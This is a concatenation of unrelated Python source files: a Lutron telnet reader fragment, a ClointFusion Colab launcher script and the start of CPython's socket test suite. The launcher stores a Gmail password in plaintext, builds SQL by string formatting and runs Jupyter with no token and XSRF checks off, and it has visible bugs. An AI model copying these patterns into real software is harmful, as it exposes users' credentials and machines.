continue
result.append([bytes(b) for b in response.split(_DELIMITER)])
_LOG.debug('Read: ' + str(result))
return result
def _read_if_available(self):
"""Read data if available.
Caller must hold _telnet_lock.
"""
try:
data = self._telnet.read_eager()
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost')
self._close()
return []
if not data:
return []
return self._read_until_prompt(initial_data=data)
|
Colab_Launcher.py
|
import os
import sys
import threading
import time
import traceback
import platform
import subprocess
import sqlite3
import requests
from helium._impl import selenium_wrappers
from pyautogui import KEYBOARD_KEYS
from rich import pretty
import pyinspect as pi
pi.install_traceback(hide_locals=True,relevant_only=True,enable_prompt=True)
pretty.install()
cf_icon_file_path = "Cloint-ICON.ico"
cursr = ""
connct = ""
email = ""
passwd= ""
url = 'https://raw.githubusercontent.com/ClointFusion/ClointFusion/master/requirements.txt'
FIRST_TIME = False
current_working_dir = os.path.dirname(os.path.realpath(__file__)) #get cwd
os.chdir(current_working_dir)
try:
os.system("{} -m pip install --upgrade pip".format(sys.executable))
except Exception as ex:
print("Error updating PIP = " + str(ex) )
requirements_page = requests.get(url)
req_pkg_lst = str(requirements_page.text).splitlines()
req_pkg_lst = list(map(lambda s: s.strip(), req_pkg_lst))
def db_create_database_connect():
"""
Function to create a database and connect to it
"""
global cursr
global connct
try:
# connct = sqlite3.connect('{}.db'.format(database_name))
connct = sqlite3.connect(r'{}\{}.db'.format(current_working_dir,"ClointFusion_DB"))
cursr = connct.cursor()
# print('Created & Connected with Database \'{}\''.format("ClointFusion_DB"))
except Exception as ex:
print("Error in db_create_database_connect="+str(ex))
def db_create_table():
global cursr
global connct
try:
table_name = 'My_Table'
table_dict={'email': 'TEXT', 'passwd': 'TEXT'}
table = str(table_dict).replace("{","").replace("'","").replace(":","").replace("}","")
# table = table.replace('INT,','INT PRIMARY KEY,',1) #make first field as PK
exec_query = "CREATE TABLE IF NOT EXISTS {}({});".format(table_name,table)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print('Table \'{}\' created'.format(table_name))
except Exception as ex:
print("Error in db_create_table="+str(ex))
def db_check_record():
global cursr
global connct
global email, passwd
table_name = 'My_Table'
exec_query = "SELECT * FROM {};".format(table_name)
cursr.execute(exec_query)
all_results = cursr.fetchall()
if all_results:
email = all_results[0][0]
passwd = all_results[0][1]
return all_results
def db_insert_rows(email, passwd):
global cursr
global connct
table_name = 'My_Table'
table_dict = {'email':email,'passwd':passwd}
table_keys = str(table_dict.keys()).replace('dict_keys([',"").replace("'","").replace("])","")
table_values = str(table_dict.values()).replace('dict_values([',"").replace("])","")
exec_query = "INSERT INTO {}({}) VALUES({});".format(table_name,table_keys,table_values)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print("Row with values {} inserted into \'{}\'".format(table_values,table_name))
def _load_missing_python_packages_windows(list_of_required_packages_1=[]):
"""
Installs Windows OS specific python packages
"""
try:
list_of_required_packages = [x.strip().lower() for x in list_of_required_packages_1]
reqs = subprocess.check_output([sys.executable, '-m', 'pip', 'list'])
installed_packages = [str(r.decode().split('==')[0]).strip().lower() for r in reqs.split()]
missing_packages = ' '.join(list(set(list_of_required_packages)-set(installed_packages)))
if missing_packages:
print("{} package(s) are missing".format(missing_packages))
if "comtypes" in missing_packages:
os.system("{} -m pip install comtypes==1.1.7".format(sys.executable))
for pkg in missing_packages:
pkg_with_version = filter(lambda a: pkg in a, req_pkg_lst)
# print(pkg_with_version)
cmd = "pip install {}".format(list(pkg_with_version)[0])
# print(cmd)
os.system(cmd)
except Exception as ex:
print("Error in _load_missing_python_packages_windows="+str(ex))
try:
import pyautogui as pg
except Exception as ex:
_load_missing_python_packages_windows(['pyautogui'])
import pyautogui as pg
os_name = str(platform.system()).lower()
if os_name != 'windows':
pg.alert("Colab Launcher works only on windows OS as of now")
exit(0)
try:
import psutil
except:
_load_missing_python_packages_windows(["psutil"])
import psutil
def is_chrome_open():
try:
for proc in psutil.process_iter(['pid', 'name']):
# This will check if there exists any process running with executable name
if proc.info['name'] == 'chrome.exe':
yes_no=pg.confirm(text='Chrome browser needs to be closed !\n\nPlease click "Yes" to forcefully close it', title="ClointFusion's Colab Launcher", buttons=['Yes', 'No'])
if yes_no == 'Yes':
try:
subprocess.call("TASKKILL /f /IM CHROME.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
try:
subprocess.call("TASKKILL /f /IM CHROMEDRIVER.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
return False
else:
return True
except Exception as ex:
pg.alert("Error while closing chrome")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
exit(0)
if is_chrome_open()==True:
pg.alert("Please close Google Chrome browser & try again")
exit(0)
# try:
# os.system("pip install -r {}".format(requirements_path))
# except Exception as ex:
try:
_load_missing_python_packages_windows(['setuptools ','wheel', 'watchdog','Pillow','pynput','pif','PyAutoGUI ','PySimpleGUI ','bs4','clipboard','emoji','folium ','helium','imutils','kaleido','keyboard','matplotlib','numpy','opencv-python','openpyxl','pandas','plotly','requests','selenium','texthero','wordcloud','zipcodes','pathlib3x','pathlib','PyQt5','email-validator','testresources','scikit-image ','pivottablejs','ipython ','comtypes','cryptocode','ImageHash','get-mac','xlsx2html ','simplegmail','xlwings ','jupyterlab','notebook','Pygments','psutil','gspread'])
except Exception as ex:
pg.alert("Error while executing pip install -r requirements.txt")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# finally:
# import ClointFusion_Lite as cfl
try:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
except:
_load_missing_python_packages_windows(['selenium','helium'])
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
from webdriver_manager.chrome import ChromeDriverManager
# try:
# import ClointFusion
# except Exception as ex:
# try:
# # os.system("pip install ClointFusion")
# _load_missing_python_packages_windows(['clointfusion'])
# except:
# pg.alert("Error while executing pip install ClointFusion")
# exc_type, exc_value, exc_tb = sys.exc_info()
# pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# sys.exit(0)
try:
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
except:
# _load_missing_python_packages_windows(['keyboard','PySimpleGUI','PyGetWindow'])
_load_missing_python_packages_windows(['PySimpleGUI','PyGetWindow'])
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
def launch_jupyter():
try:
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.8 && jupyter serverextension enable --py jupyter_http_over_ws"
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
except:
print("Error in launch_jupyter")
pg.alert("Error in launch_jupyter")
#Kill the port if busy
try:
os.system('taskkill /F /PID 8888')
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.7 && jupyter serverextension enable --py jupyter_http_over_ws"
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# 'jupyter notebook --NotebookApp.allow_origin='https://colab.research.google.com' --NotebookApp.port_retries=0 --notebook-dir="" --no-browser --allow-root --NotebookApp.token='' --NotebookApp.disable_check_xsrf=True --port=8888
os.system(cmd)
except Exception as ex:
print("Port is busy = "+str(ex))
db_create_database_connect()
db_create_table()
def get_email_password_from_user():
global FIRST_TIME
try:
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text='Please enter Gmail ID:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-GMAIL-', justification='c',focus=True)],
[sg.Text(text='Please enter Password:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-PASSWD-', justification='c',password_char='*')],
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("These credentials will be stored on you local computer, used to automatically login & will be associated with Colab Launcher")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
# break
sys.exit(0)
if event == 'OK':
if values and values['-GMAIL-'] and values['-PASSWD-']:
db_insert_rows(values['-GMAIL-'],values['-PASSWD-'])
FIRST_TIME = True
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
def db_delete_data():
global cursr
cursr.execute("""{}""".format("DELETE FROM 'My_Table' WHERE email='mayur@cloint.com'"))
all_results = cursr.fetchall()
print(all_results)
# db_delete_data()
if not db_check_record():
get_email_password_from_user()
def get_colab_url_from_user():
ret_val = "cancelled"
try:
dropdown_list = ["ClointFusion Labs (Public)", "ClointFusion Starter (Hackathon)"] #"ClointFusion Lite (Interns Only)"
oldKey = "Please choose desired Colab :"
# oldValue = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
oldValue = 'ClointFusion Labs (Public)'
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text=oldKey,font=('Courier 12'),text_color='yellow'),sg.Listbox(dropdown_list,size=(30, 5),key='user_choice',default_values=oldValue,enable_events=True,change_submits=True)],#oluser_choice
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("This is an automated tool which connects ClointFusion Colab with your Local Runtime.\nSign-in using your Gmail ID & wait for setup to Finish..")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
break
if event == 'OK':
if values and values['user_choice']:
ret_val = str(values['user_choice'][0])
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
finally:
return ret_val
def modify_file_as_text(text_file_path, text_to_search, replacement_text):
import fileinput
with fileinput.FileInput(text_file_path, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace(text_to_search, replacement_text), end='')
def connect_to_local_runtime(user_choice):
try:
# import chromedriver_binary
if user_choice == "ClointFusion Labs (Public)":
colab_url = "https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb" #https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# colab_url = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# elif user_choice == "ClointFusion Lite (Interns Only)":
# #Extract encrypted version of ClointFusion_Lite to a specific folder and in Colab import that folder
# colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/11MvoQfNFXJqlXKcXV1LBVUE98Ks48M_a'
elif user_choice == "ClointFusion Starter (Hackathon)":
colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/1G9mh58z8AbWqBit2TC4Wgg6p_eHPvUJB'
user_data_path = "C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin())
modify_file_as_text(user_data_path + '\\Default\\Preferences', 'crashed', 'false')
options = Options()
options.add_argument("--start-maximized")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
if os_name == "windows":
options.add_argument("user-data-dir=C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin()))
elif os_name == "darwin":
options.add_argument("user-data-dir=/Users/{}/Library/Application/Support/Google/Chrome/User Data".format(os.getlogin()))
options.add_argument(f"profile-directory=Default")
browser_driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
browser.set_driver(browser_driver)
browser.go_to(colab_url)
chrome = gw.getWindowsWithTitle('Google Chrome')[0]
chrome.activate()
# pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
# kb.press_and_release('esc')
# kb.press_and_release('esc')
try:
browser.wait_until(browser.Text("Code").exists,timeout_secs=6)
except :#selenium_wrappers.common.exceptions.TimeoutException:
try:
browser.click(email)
except:
browser.write(email, into='Email or phone')
browser.click('Next')
time.sleep(0.5)
browser.write(passwd, into='Enter your password')
browser.click('Next')
time.sleep(0.5)
browser.wait_until(browser.Text("Code").exists,timeout_secs=240)
# kb.press_and_release('esc')
# time.sleep(0.2)
# pg.press(ESCAPE)
# time.sleep(0.2)
# press(ESCAPE)
# time.sleep(0.2)
if FIRST_TIME:
#create short-cut
browser.press(browser.CONTROL + 'mh')
time.sleep(1)
v = S("//input[@id='pref_shortcut_connectLocal']")
browser.write('',v)
browser.press(browser.CONTROL + '1')
time.sleep(0.5)
browser.click("SAVE")
time.sleep(1)
#use short-cut
browser.press(browser.CONTROL + '1')
time.sleep(1)
# pg.alert("HKHR")
pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
time.sleep(1)
if FIRST_TIME:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
pg.write("http://localhost:8888")
# kb.write("http://localhost:8888")
time.sleep(2)
# click("CONNECT")
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(1)
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(2)
else:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
browser.press(browser.ENTER)
time.sleep(2)
# try:
# img = "Restore_Bubble.PNG"
# pos = pg.locateOnScreen(img, confidence=0.8) #region=
# pg.alert(pos)
# pg.click(*pos)
# except:
# pass
pg.alert("Ready ! Google Colab is now connected with your Local Runtime.\n\nPlease click 'OK' & you are all set to work on ClointFusion Colabs...")
except Exception as ex:
print("Error in connect_to_local_runtime="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
pg.alert("Error in connect_to_local_runtime="+str(ex))
connect_to_local_runtime()
# def popup_msg():
# sg.PopupTimed("Loading... Please wait", auto_close=30)
if __name__ == "__main__":
try:
user_choice = get_colab_url_from_user()
if user_choice != "cancelled":
# creating threads
t1 = threading.Thread(target=connect_to_local_runtime,args=(user_choice,))
t2 = threading.Thread(target=launch_jupyter)
# t3 = threading.Thread(target=popup_msg)
t1.start()
t2.start()
# t3.start()
t1.join()
t2.join()
# t3.join()
else:
print("User Cancelled the Launch")
except Exception as ex:
pg.alert("Error in Main="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
print("Error in Main="+str(ex))
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
